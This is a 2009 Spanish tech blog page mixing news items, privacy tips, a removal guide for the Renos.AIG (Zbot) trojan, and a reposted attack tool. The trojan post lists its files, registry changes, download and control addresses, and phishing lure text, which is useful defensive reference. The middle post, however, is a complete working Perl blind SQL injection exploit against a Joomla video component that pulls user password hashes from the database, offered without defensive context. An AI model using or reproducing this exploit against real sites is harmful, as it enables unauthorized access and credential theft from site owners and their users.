sábado, 28 de noviembre de 2009

Modelo Desarrollo de Software(SCRUM)

UML(Historia, Definicion e Implementacion)

miércoles, 25 de noviembre de 2009

Nuestros datos privados en las páginas web



El auge que ha tenido internet ha sido impresionante, servicios como el correo electrónico, mensajería instantánea, vlogs, blogs, redes sociales, entre otras, guardan información privada que nosotros mismos revelamos al registrarnos en múltiples sitios. Además el incremento de correo basura (spam) ha dado un incremento impresionante, lo cual ha servido de anzuelo para que millones de usuarios sufran desde el robo de cuentas de correo electrónico, redes sociales hasta la usurpación de la identidad con credenciales bancarias.

Los malandrines informáticos ha aprovechado de usuarios que por un momento se descuidan y se convierten en una víctima más de las estadísticas; es muy sonado el caso de la cantante estadounidense Britney Spears a la que le robaron la contraseña del Tweeter, que utilizaba para comunicarse con sus fanáticos. Pero en una ocasión apareció la leyenda en su Tweeter: “Me entrego a Lucifer todos los días para que llegue lo más rápidamente posible. ¡Gloria a Satanás!” y “Espero que el nuevo orden mundial llegue tan pronto como sea posible”.

Por ello, si deseamos proteger nuestra información, es importante conocer ¿cómo almacenan los sitios nuestros datos?

Algo tan sencillo como reenviar un email puede ser tan peligroso como gritar a los cuatro vientos, estas personas son mi familia, amigos, vecinos... y muchas veces no se toma en cuenta, que realizar esto, estamos revelando nuestro correo electrónico y el de los demás.

Otra manera en que se guardan nuestros datos personales, es cuando realizamos compras por internet; al elegir un artículo y seleccionar la forma de pago, introducimos nuestros datos de las cuentas bancarias, ¿quien nos asegura que el sitio está 100% seguro? ¿que nuestra terminal no está siendo espiada o monitoreada?, bien, si muchos dirán, esque uso paypal y es seguro. Bueno, en esta vida sólo la muerte la tenemos segura. Porque ni Paypal ni ningun otro mecanismo se protección es 100% efectivo.

Las redes sociales como Facebook, MySapace, HI5, Metroflog, son uno de las fuentes de información que más utilizan las bandas de crimen organizado para secuestros, extorsiones telefónicas, intimidaciones, etc. Es muy común que un usuario agregue cientos de "amigos" a su red social, sin embargo, de tantos "amigos" más de alguno está interesado en ¿cómo fregarte?.

Recomiendo siempre tener su antivirus actualizado y realizar escaneos por lo menos una vez al mes a todas las unidades de disco de tu equipo, así como un escaneo a cada memoria usb y tener desactivado el autorun. Contar con un buen cortafuegos o firewall, que bloquee todas aquellas conexiones desconocidas. Evitar utilizar datos veridicos en las páginas de registro, a menos de ser 100% necesario. Realizar cambios por lo menos cada seis meses en las contraseñas de sus cuentas, así mismo evitar hacer cualquier modificación a su contraseña desde enlaces de correos electronicos; siempre hacerlo desde la página oficial.

Son algunas de las recomendaciones que debemos tener muy presentes, nos vemos en la proxima.

viernes, 6 de noviembre de 2009

Renos.AIG (Peligrosidad: 1 - Mínima)

Troyano que descarga archivos al equipo infectado y modifica el registro.

*Si utiliza Windows Me, XP o Vista, y sabe cuándo se produjo la infección, puede usar la característica de ‘Restauración del Sistema’ para eliminar el virus volviendo a un punto de restauración anterior a la infección (tenga en cuenta que se desharán los cambios de configuración de Windows y se eliminarán todos los archivos ejecutables que haya creado o descargado desde la fecha del punto de restauración). Si tiene alguna duda o problema sobre el funcionamiento de esta opción puede consultar nuestras guías sobre la Restauración en Windows XP o la Restauración en Windows Vista.

* En caso de que no pueda volver a un punto de Restauración anterior o no le funcione, es recomendable que desactive temporalmente la Restauración del Sistema antes de eliminar el virus por otros medios, ya que podría haberse creado una copia de seguridad del virus. Si necesita ayuda vea Deshabilitar restauración del sistema en Vista, XP y Me. A continuación siga estos pasos para la eliminación del virus:

1. Reinicie su ordenador en Modo Seguro o Modo a Prueba de Fallos. Si no sabe cómo se hace siga las instrucciones que se indican en este manual de Cómo iniciar su computadora en Modo a prueba de fallos.

2. Con un antivirus actualizado, localice todas las copias del virus en el disco duro de su PC. Si no dispone de antivirus, visite nuestra página de Antivirus gratuitos.

Elimine la siguiente carpeta:
o %System%\wsnpoem.

Elimine los siguientes ficheros:
o %System%\ntos.exe
o %System%\wsnpoem\audio.dll
o %System%\wsnpoem\video.dll

Nota:%System% es una variable que hace referencia al directorio del sistema de Windows.
Por defecto es C:\Windows\System (Windows 95/98/Me), C:\Winnt\System32 (Windows NT/2000), o C:\Windows\System32 (Windows XP).

Nota: A Menudo los antivirus informan de que 'no puede reparar un fichero' en el caso de gusanos o troyanos debido a que no hay nada que reparar, simplemente hay que borrar el fichero.

3. Si no se puede reparar la infección o borrar los ficheros, puede ser debido a que el fichero está en uso por estar el virus en ejecución (residente en memoria).
En el caso de que no se pueda eliminar el fichero del virus, debe terminar manualmente el proceso en ejecución del virus. Abra el Administrador de Tareas (presione Control+Mayúsculas+Esc). En Windows 98/Me seleccione el nombre del proceso y deténgalo. En Windows 2000/XP/Vista, en la pestaña 'Procesos' pulse con el botón derecho en el proceso y seleccione 'Terminar Proceso'. A continuación vuelva a intentar el borrado o reparación de los ficheros que se han creado por la acción del virus. Puede obtener más información en la sección "Administrador de Tareas", de la página Eliminar librerías .DLL o .EXE.

4. A continuación hay que editar el registro para deshacer los cambios realizados por el virus. Si necesita información sobre cómo editar el registro puede ver esta guía de edición del registro. Sea extremadamente cuidadoso al manipular el registro. Si modifica ciertas claves de manera incorrecta puede dejar el sistema inutilizable.

Elimine las siguientes claves del registro y todo su contenido:

Clave:HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer
\{19127AD2-394B-70F5-C650-B97867BAA1F7}\

Clave:HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer
\{43BF8CD1-C5D5-2230-7BB2-98F22C2B7DC6}\

Clave:HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer
\{4B19E1F3-5B47-C615-C75A-E0FD63DB477F}\

Elimine la siguiente entrada del registro:

Clave:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Network
Valor:UID = "{nombre del equipo}_{números aleatorios}"

Restaure la siguiente entrada del registro al valor que tuviese anteriormente, a continuación se indica su valor por defecto:

Clave:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
Valor:Userinit = "%System%\Userinit.exe,"

5. Elimine todos los archivos temporales del ordenador, incluidos los archivos temporales del navegador, vacíe también la Papelera de reciclaje.

6. Reinicie su ordenador y explore todo el disco duro con un antivirus para asegurarse de la eliminación del virus. Si desactivó la restauración del sistema, recuerde volver a activarla. Cree un punto de restauración, le resultará útil para recurrir a él en caso de posibles infecciones o problemas en el futuro.

Nombre completo: Trojan.W32/Renos.AIG
Tipo: [Trojan] - Caballo de Troya: programa que parece beneficioso o útil pero resulta ser malicioso en algún momento. No se propaga por sí mismo.
Plataforma: [W32] - Ejecutable PE (.EXE, .SCR, .DLL) que corre en Windows de 32 bits: 95, 98, Me, NT, 2000, XP, 2003
Tamaño (bytes): 73216 Alias:TROJ_RENOS.AIG (Trend Micro), TR/Spy.ZBot.DFO (AVIRA), Trojan.Spy.Wsnpoem.GT (Bit Defender), TrojanSpy.Zbot.edw (Quick Heal), Trojan.Zbot-1962 (ClamAV), Trojan.Proxy.3747 (Doctor Web), Trojan-Spy.Win32.Zbot.edw (F-Secure), Trojan-Spy.Win32.Zbot.edw (Kaspersky), Win32/Spy.Agent.PZ (ESET), W32/Zbot.AXQ (Norman), Mal/EncPk-CZ (Sophos), W32/Downldr2.DIHS (Otros), Win32/Kollah.NW (Computer Associates), W32/Zbot.ED!tr.spy (Otros), Win32.Outbreak.Fedex4711 (Otros), Trojan:Win32/Zbot.BF (Otros), Trojan.Win32.Ntos.je (Otros), Trojan-Spy.Win32.Zbot.edv (Otros), TrojanSpy.Zbot.TI (Otros), Trojan.Spy.ZBot.DFO (Otros), Agent.AADX (Otros), Email.Trojan.GZC (ClamAV), Agent.AADX (AVG), Win32.Outbreak.Fedex4711.DL (Otros), Trojan-Spy.Zbot.EDW (K7 Computing)


Método de Infección/Efectos

Cuando se ejecuta crea la carpeta %System%\wsnpoem.

Nota:%System% es una variable que hace referencia al directorio del sistema de Windows.
Por defecto es C:\Windows\System (Windows 95/98/Me), C:\Winnt\System32 (Windows NT/2000), o C:\Windows\System32 (Windows XP).

Descarga una copia de sí mismo en %System%\ntos.exe. También descarga los siguientes archivos no maliciosos:

* %System%\wsnpoem\audio.dll
* %System%\wsnpoem\video.dll

Modifica la siguiente entrada del registro para ejecutarse en cada arranque del sistema:

Clave:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
Valor:Userinit = "%System%\Userinit.exe,%System%\ntos.exe,"

También crea las siguientes claves y entradas en el registro:

Clave:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Network
Valor:UID = "{nombre del equipo}_{números aleatorios}"

Clave:HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer
\{19127AD2-394B-70F5-C650-B97867BAA1F7}\

Clave:HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer
\{43BF8CD1-C5D5-2230-7BB2-98F22C2B7DC6}\

Clave:HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer
\{4B19E1F3-5B47-C615-C75A-E0FD63DB477F}\

Abre un puerto TCP aleatorio para conectarse con la siguiente dirección de Internet:

* http://blatundalqik.ru/[-eliminado-]rev.bin

Accede a la siguiente dirección de Internet para descargarse otros programas maliciosos:

* http://66.199.242.115

Método de Propagación

Carece de rutina propia de propagación. Suele llegar al sistema como adjunto de un falso correo en inglés que informa de que no se ha podido enviar un paquete. El mensaje tiene las siguientes características:

Remitente: Falsificado

Asunto: "Fedex tracking number 2344492918"

Cuerpo del mensaje:

Unfortunately we were not able to deliver postal package you sent on
August the 1st in time because the recipient’s address is not correct.

Please print out the invoice copy attached and collect the package at our office



Your FEDEX.com

Adjunto: ZD76128824.Zip
Dentro de este archivo se encuentra comprimido el fichero WD6128922.Exe, que contiene una copia del gusano. En caso de que un usuario abra el archivo comprido y ejecute el gusano, se quedará infectado.

Nombres de Ficheros Adjuntos (virus que llegan por correo)

* ZD76128824.Zip

Asunto del mensaje (virus que llegan por correo)

* Fedex tracking number 2344492918

Más información acerca de este virus en:

* Trend Micro
* AVIRA
* K7 Computing

joomla component com_mytube (user_id) Blind SQL Injection Vulnerability

#!/usr/bin/perl -w

#---------------------------------------------------------------------------------
#joomla component com_mytube (user_id) Blind SQL Injection Vulnerability
#---------------------------------------------------------------------------------

#Author : Chip D3 Bi0s
#Group : LatiHackTeam
#Email : chipdebios[alt+64]gmail.com
#Date : 15 September 2009
#Critical Lvl : Moderate
#Impact : Exposure of sensitive information
#Where : From Remote
#---------------------------------------------------------------------------

#Affected software description:
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

#Application : MyRemote Video Gallery
#version : 1.0 Beta
#Developer : Jomtube Team
#License : GPL type : Non-Commercial
#Date Added : Aug 24, 2009
#Download : http://joomlacode.org/gf/download/frsrelease/10834/42943/com_mytube_1.0.0_2009.08.02.zip
#Description :

#MyRemote Video Gallery is the most Powerful Video Extension made for Joomla 1.5x
#which will allow you to transform your Website into a professional looking Video
#Gallery with functionality that is similar to YouTube.com. MyRemote Video Gallery
#is an open source (GNU GPL) video sharing Joomla extension has been created
#specifically for the Joomla 1.5x (MVC) Framework and can not be used without Joomla.

#MyRemote Video Gallery gives you the option to Embed Videos from Youtube and offers
#the Framework so you can create your own Remote Plugins for other Remote Servers like
#Dailymotion, Google Video, Vimeo, Blip.tv, Clipser, Revver, a which will allow you to
#run your site for low cost since all the bandwidth usage and hard drive space is located
#on the video server sites. So if you already have a large library of Videos on some
#Remote Sites like Youtube.com you can build the Video Part of your Site Very Quickly.

#---------------------------------------------------------------------------


#I.Blind SQL injection (user_id)
#Poc/Exploit:
#~~~~~~~~~~~
#http://127.0.0.1/[path]/index.php?view=videos&type=member&user_id=X[blind]&option=com_mytube&Itemid=null
#X: Valid User_id

#+++++++++++++++++++++++++++++++++++++++
#[!] Produced in South America
#+++++++++++++++++++++++++++++++++++++++


use LWP::UserAgent;
use Benchmark;
my $t1 = new Benchmark;

system ('cls');
print "\n\n";
print "\t\t[+] ---------------------------------[+]\n";
print "\t\t| | Chip d3 Bi0s | |\n";
print "\t\t| MyRemote Video Gallery Bsql | \n";
print "\t\t|joomla component com_mytube (user_id)| \n";
print "\t\t[+]----------------------------------[+]\n\n";


print "http://127.0.0.1/[path]/index.php?view=videos&type=member&user_id=62:\n";chomp(my $target=);

$w="Total Videos In Category";
$column_name="concat(password)";
$table_name="jos_users";


$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');

print "----------------Inyectando----------------\n";


$host = $target . "+and+1=1&option=com_mytube&Itemid=null";
my $res = $b->request(HTTP::Request->new(GET=>$host)); my $content = $res->content; my $regexp = $w;
if ($content =~ /$regexp/) {

$host = $target . "+and+1=2&option=com_mytube&Itemid=null";
my $res = $b->request(HTTP::Request->new(GET=>$host)); my $content = $res->content; my $regexp = $w;
if ($content =~ /$regexp/) {print " [-] Exploit Fallo :(\n";}

else

{print " [-] Vulnerable :)\n";

$d=0;


for ($idusuario=62;$idusuario<=80;$idusuario++) { $host = $target . "+and+ascii(substring((SELECT+".$column_name."+from+".$table_name."+where+id=".$idusuario."+limit+0,1),1,1))>0&option=com_mytube&Itemid=null";
my $res = $b->request(HTTP::Request->new(GET=>$host));
my $content = $res->content;
my $regexp = $w;
if ($content =~ /$regexp/) {$idusu[$d]=$idusuario;$d=$d+1}

}

print " [+] Usuario existentes : "." ".join(',', @idusu) . "\n";

print " [-] # Usuario que desea extraer : ";chomp($iduss=);

for ($x=1;$x<=32;$x++) { $host = $target . "+and+ascii(substring((SELECT+".$column_name."+from+".$table_name."+where+id=".$iduss."+limit+0,1),".$x.",1))>57&option=com_mytube&Itemid=null";
my $res = $b->request(HTTP::Request->new(GET=>$host)); my $content = $res->content; my $regexp = $w;
print " [!] ";if($x <= 9 ) {print "0$x";}else{print $x;} if ($content =~ /$regexp/) { for ($c=97;$c<=102;$c++) { $host = $target . "+and+ascii(substring((SELECT+".$column_name."+from+".$table_name."+where+id=".$iduss."+limit+0,1),".$x.",1))=".$c."&option=com_mytube&Itemid=null"; my $res = $b->request(HTTP::Request->new(GET=>$host));
my $content = $res->content;
my $regexp = $w;


if ($content =~ /$regexp/) {$char=chr($c); $caracter[$x-1]=chr($c); print "-Caracter: $char\n"; $c=102;}
}


}
else
{

for ($c=48;$c<=57;$c++) { $host = $target . "+and+ascii(substring((SELECT+".$column_name."+from+".$table_name."+where+id=".$iduss."+limit+0,1),".$x.",1))=".$c."&option=com_mytube&Itemid=null"; my $res = $b->request(HTTP::Request->new(GET=>$host));
my $content = $res->content;
my $regexp = $w;

if ($content =~ /$regexp/) {$char=chr($c); $caracter[$x-1]=chr($c); print "-Caracter: $char\n"; $c=57;}
}


}

}

print " [+] Password :"." ".join('', @caracter) . "\n";

my $t2 = new Benchmark;
my $tt = timediff($t2, $t1);
print "El script tomo:",timestr($tt),"\n";

}
}

else

{print " [-] Exploit Fallo :(\n";}

# milw0rm.com [2009-09-21]

Google Maps Y Street View ahora en Mexico




A partir del 9 de Noviembre estará disponible en las principales ciudades de México
Google Street View. Las ciudades con las que dará inicio Google Street View México son la ciudad de México, Guadalajara, Puebla, Monterrey, Cancún, Puerto Vallarta y la Rivera Maya. “México es el primer país en América Latina en tener Street View con información de la Ciudad de México, Monterrey, Guadalajara, Puebla, Cancún y la Riviera Maya y Puerto Vallarta”, declaró Miguel Angel Alva, director de Mercadotecnia de Google México. Como en las versiones europeas los negocios podrán incluir información en los mapas del país. Ademas Google anunció la llegada de Google Maps a México lo que permitirá a restaurantes, museos, parques y empresas cargar su información a google para que los usuarios puedan locarlizarlos facilmente en el mapa. Segun Miguel Angel Alba director de Mercadotecnia de México la idea es proveer al usuario de suficiente información para tomar acciones sobre que actividades pueden visitar en todo México. Esto fue algo que dijo Miguel en la conferencia impartida en Septiembre pasado en Mérida y que por fin se hace realidad al menos paulatinamente. Esperemos pronto ver a todas las ciudades de México en Google Street View y en los mapas de Google México.

lunes, 2 de noviembre de 2009

Incompatibles Windows 7 y iPhone



Se avisará a los usuarios para una pronta actualización y no tener problemas
NUEVA YOYK, EU.- La gran popularidad de iPhone ha llegado hasta a los PCs, tanto que su uso es mayoritario para pasar datos desde el PC al teléfono con iTunes.

Por ahora parece haber problemas con Windows 7, aunque se ha visto en algunos casos y no en la mayoría de ordenadores con este SO.


Muchos usuarios están optando por comprar un ordenador de sobremesa o un portátil con este nuevo sistema operativo y muchos de ellos disponen de un terminal iPhone.


Al parecer el problema entre Windows 7 y iPhone proviene del chipset de Intel P55 Express USB, el cual nos lleva a un error ( 0xE8000065 ), siempre que el usuario intente sincronizar casi cualquier archivo.


Desde EngadgetMobile aconsejan utilizar un PCI interno USB que no sea del fabricante californiano, cosa que arreglará el problema en cuestión de apenas unos minutos. Intel ya está intentado solucionar este fallo y problema que les tiene trabajando desde hace unas semanas y que posiblemente llegue en los próximos días.

Se avisará a los usuarios para una pronta actualización del mismo y no tener problemas de transferir datos desde Windows 7 a iPhone.


Via
Informador

Facebook tendrá su 'cementerio'


La popular red social ha decidido tener en cuenta un punto controvertido, que no es más que la muerte real de sus usuarios. Hasta el momento no había decisión sobre qué hacer con sus perfiles, pero parece que ya tienen solución. Debido a la posibilidad y problemas de seguridad, bromas de mal gusto, etcétera, Facebook comprobará legalmente la muerte de sus usuarios y han desarrollado la idea de "perfil conmemorativo" para que de manera privada la gente allegada recuerde al usuario.



Facebook ya dispone de más de 300 millones de usuarios alrededor del mundo y ha anunciado un espacio dedicado a la memoria de los usuarios que pasen a mejor vida. Es lo que han denominado "perfiles conmemorativos".

En palabras de Max Kelly, responsable de seguridad de Facebook: "Cuando alguien nos deja, no abandona ni nuestra memoria ni nuestra red social [...] Para reflejar esta realidad hemos creado la idea de 'perfiles conmemorativos' como un lugar donde la gente puede guardar y compartir los recuerdos de aquellos que han fallecido".



Dichos perfiles serán privados y por tanto habrá que ofrecer a Facebook una prueba fehaciente de la muerte del usuario si queremos que nuestro allegado / familiar / amigo disponga de este tipo de perfil. Facebook también se ofrece el servicio de retirar toda la información del usuario si la familia quiere para evitar el mal trago.

Via Muycomputer.com

Triunfo "twittero" sobre los impuestos


En un hecho sin precedentes en México, tras la presión ejercida en una red social, este fin de semana el Congreso rechazó el impuesto para gravar el uso de internet con 3% que sería aplicado según el Paquete Fiscal 2010.

Los legisladores reconocieron que la decisión respondió a la presión del movimiento #Internet Necesario generado en la red social Twitter.

Durante la sesión, el senador de la oposición Francisco Castellón Fonseca, presidente de la Comisión de Ciencia y Tecnología, subió a tribuna para rechazar este gravamen.

"Tasar las telecomunicaciones nos parece una barbaridad; nos parece un atentado en contra del avance, no solamente científico y técnico, sino también del avance social. Tasar las telecomunicaciones es ahondar la brecha de la disponibilidad de la tecnología entre los sectores de altos ingresos y de bajos ingresos", aseguró.

La exención, sin embargo, no incluye los servicios de telefonía ni televisión por cable.
Se produjo un error en este gadget.

Etiquetas

INTERNET (457) newsweek (305) SEGURIDAD (225) software (136) HACK (86) Hacker (46) GOOGLE (44) Geek (41) hardware (36) WINDOWS (34) Hackers (31) CRACK (29) video (28) DESCARGA (27) facebook (27) videos (26) Celulares (25) MICROSOFT (22) Informatica (21) apple (19) GRATIS (18) technology (18) virus (18) exploit (17) computación (16) informatico (16) web (15) cracker (14) INALAMBRICO (13) WINDOWS 7 (13) noticias (11) MSN (10) termino (10) ACTUALIZACION (9) Gamer (9) LapTops (9) Mac (9) PASSWORD (9) WINDOWS XP (9) dns (9) firefox (9) juegos (9) FOTOS (8) cientifico (8) iphone (8) WEP (7) antivirus (7) bibliografia (7) Desencriptar (6) INFINITUM (6) wifi (6) youtube (6) Craker (5) Culiacan (5) DESMOSTRACION (5) TELEFONIA (5) messenger (5) DIRECTA (4) DOWNLOAD (4) ESPAÑOL (4) XBOX (4) gmail (4) xss (4) Glosario (3) HTML (3) WPA (3) anuncios (3) hosting (3) hotmail (3) Guru (2) ajax (2) ataques (2) wpa2 (2)